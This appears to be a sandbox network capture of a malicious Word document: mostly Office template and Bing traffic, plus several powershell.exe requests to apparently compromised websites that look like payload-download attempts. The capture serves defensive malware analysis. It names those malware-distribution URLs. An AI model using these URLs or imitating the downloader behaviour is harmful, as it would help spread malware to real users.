    Content-Length: 1097591
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
    Last-Modified: Wed, 29 Aug 2018 18:16:06 GMT
    ETag: 0x8D60DDB7D10C490
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: f8f55181-d01e-00e1-6697-a0df1c000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1881952
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
    ETag: 0x8D60DDC0007D57D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 380b83a1-d01e-0040-6a97-a01187000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1310275
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
    Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
    ETag: 0x8D60DDBA6587FB6
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: e4f0118c-501e-0148-3a97-a06910000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2527736
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8laspQm0xsAUTSeMcDawqA==
    Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
    ETag: 0x8D60DDBDD02F94A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:57 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    DNS
    162.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    162.61.62.23.in-addr.arpa
    IN PTR
    Response
    162.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-162.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    23.251.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.251.17.2.in-addr.arpa
    IN PTR
    Response
    23.251.17.2.in-addr.arpa
    IN PTR
    a2-17-251-23.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 621794
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: DFD8B23ACE2A4F1C99B4C97990E9F26A Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 792794
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89EA1689DA75476AAD8A88412D220C27 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 627437
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B6C515ADB96647A695C925B3A6A34FC9 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 659775
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3A43083CA57E4BC699E4040793612494 Ref B: LON04EDGE0913 Ref C: 2024-05-20T12:39:22Z
    date: Mon, 20 May 2024 12:39:21 GMT
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    106.246.116.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    106.246.116.51.in-addr.arpa
    IN PTR
    Response
  • 52.109.28.47:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    WINWORD.EXE
    1.7kB
    7.7kB
    11
    10

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 66.96.134.60:80
    http://givingthanksdaily.com/web/VK/
    http
    powershell.exe
    308 B
    1.3kB
    5
    3

    HTTP Request

    GET http://givingthanksdaily.com/web/VK/

    HTTP Response

    404
  • 103.197.57.20:80
    http://tskgear.com/wp-content/uploads/2017/Fo/
    http
    powershell.exe
    364 B
    697 B
    6
    4

    HTTP Request

    GET http://tskgear.com/wp-content/uploads/2017/Fo/

    HTTP Response

    301
  • 103.197.57.20:443
    https://tskgear.com/product/foscor-double-helical/
    tls, http
    powershell.exe
    2.1kB
    70.0kB
    34
    59

    HTTP Request

    GET https://tskgear.com/wp-content/uploads/2017/Fo/

    HTTP Response

    301

    HTTP Request

    GET https://tskgear.com/product/foscor-double-helical/

    HTTP Response

    200
  • 88.221.83.184:443
    https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.4kB
    6.2kB
    16
    11

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 177.12.170.95:443
    https://mrveggy.com/erros/tS1/
    tls, http
    powershell.exe
    768 B
    4.1kB
    9
    9

    HTTP Request

    GET https://mrveggy.com/erros/tS1/

    HTTP Response

    403
  • 173.254.237.178:80
    http://uniteddatabase.net/cgi-sys/suspendedpage.cgi
    http
    powershell.exe
    557 B
    8.7kB
    9
    11

    HTTP Request

    GET http://uniteddatabase.net/wp-admin/tf/

    HTTP Response

    302

    HTTP Request

    GET http://uniteddatabase.net/cgi-sys/suspendedpage.cgi

    HTTP Response

    200
  • 23.62.61.162:443
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    tls, http
    WINWORD.EXE
    1.2kB
    5.9kB
    8
    8

    HTTP Request

    GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    tls, http
    WINWORD.EXE
    2.6kB
    50.1kB
    34
    41

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    tls, http
    WINWORD.EXE
    2.4kB
    41.0kB
    30
    35

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    tls, http
    WINWORD.EXE
    1.7kB
    37.5kB
    20
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    tls, http
    WINWORD.EXE
    32.0kB
    1.0MB
    571
    738

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    tls, http
    WINWORD.EXE
    85.7kB
    3.4MB
    1612
    2459

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
    tls, http
    WINWORD.EXE
    2.0kB
    30.5kB
    23
    27

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    tls, http
    WINWORD.EXE
    2.4kB
    39.7kB
    30
    34

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
    tls, http
    WINWORD.EXE
    1.8kB
    36.2kB
    21
    31

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    tls, http
    WINWORD.EXE
    10.1kB
    278.2kB
    156
    206

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    tls, http
    WINWORD.EXE
    8.8kB
    267.7kB
    144
    199

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    tls, http
    WINWORD.EXE
    2.6kB
    38.9kB
    31
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    tls, http
    WINWORD.EXE
    2.1kB
    41.7kB
    27
    35

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    tls, http
    WINWORD.EXE
    2.0kB
    37.5kB
    25
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    tls, http
    WINWORD.EXE
    2.5kB
    38.9kB
    31
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    tls, http
    WINWORD.EXE
    14.5kB
    340.3kB
    226
    249

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    tls, http
    WINWORD.EXE
    36.2kB
    1.2MB
    614
    835

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    tls, http
    WINWORD.EXE
    26.9kB
    759.7kB
    432
    549

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    tls, http
    WINWORD.EXE
    59.8kB
    1.8MB
    1029
    1334

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
    tls, http
    WINWORD.EXE
    1.9kB
    25.9kB
    22
    24

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    tls, http
    WINWORD.EXE
    2.1kB
    37.1kB
    26
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    tls, http
    WINWORD.EXE
    13.0kB
    319.8kB
    203
    236

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    tls, http
    WINWORD.EXE
    78.8kB
    2.7MB
    1403
    1962

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    tls, http
    WINWORD.EXE
    121.4kB
    3.6MB
    1993
    2555

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    tls, http
    WINWORD.EXE
    3.5kB
    71.1kB
    46
    58

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
    tls, http
    WINWORD.EXE
    1.6kB
    32.0kB
    18
    28

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
    tls, http
    WINWORD.EXE
    1.8kB
    27.5kB
    21
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    tls, http
    WINWORD.EXE
    1.6kB
    27.2kB
    17
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    tls, http
    WINWORD.EXE
    1.6kB
    28.2kB
    18
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    tls, http
    WINWORD.EXE
    1.6kB
    29.7kB
    18
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    tls, http
    WINWORD.EXE
    1.5kB
    27.6kB
    16
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    tls, http
    WINWORD.EXE
    2.0kB
    28.0kB
    23
    24

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    tls, http
    WINWORD.EXE
    1.6kB
    27.4kB
    17
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    tls, http
    WINWORD.EXE
    1.5kB
    24.9kB
    15
    23

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    tls, http
    WINWORD.EXE
    6.7kB
    310.2kB
    119
    228

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    tls, http
    WINWORD.EXE
    9.0kB
    291.8kB
    161
    213

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    tls, http
    WINWORD.EXE
    9.0kB
    287.7kB
    146
    211

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    tls, http
    WINWORD.EXE
    21.5kB
    573.5kB
    321
    418

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    tls, http
    WINWORD.EXE
    21.8kB
    666.1kB
    361
    484

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    tls, http
    WINWORD.EXE
    21.7kB
    726.9kB
    377
    526

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    tls, http
    WINWORD.EXE
    39.5kB
    1.1MB
    684
    824

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    tls, http
    WINWORD.EXE
    75.7kB
    2.2MB
    1177
    1558

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    tls, http
    WINWORD.EXE
    44.4kB
    1.4MB
    717
    982

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

    HTTP Response

    200
  • 2.17.251.23:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    tls, http
    WINWORD.EXE
    81.6kB
    2.6MB
    1377
    1881

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

    HTTP Response

    200
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    97.6kB
    2.8MB
    2037
    2031

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

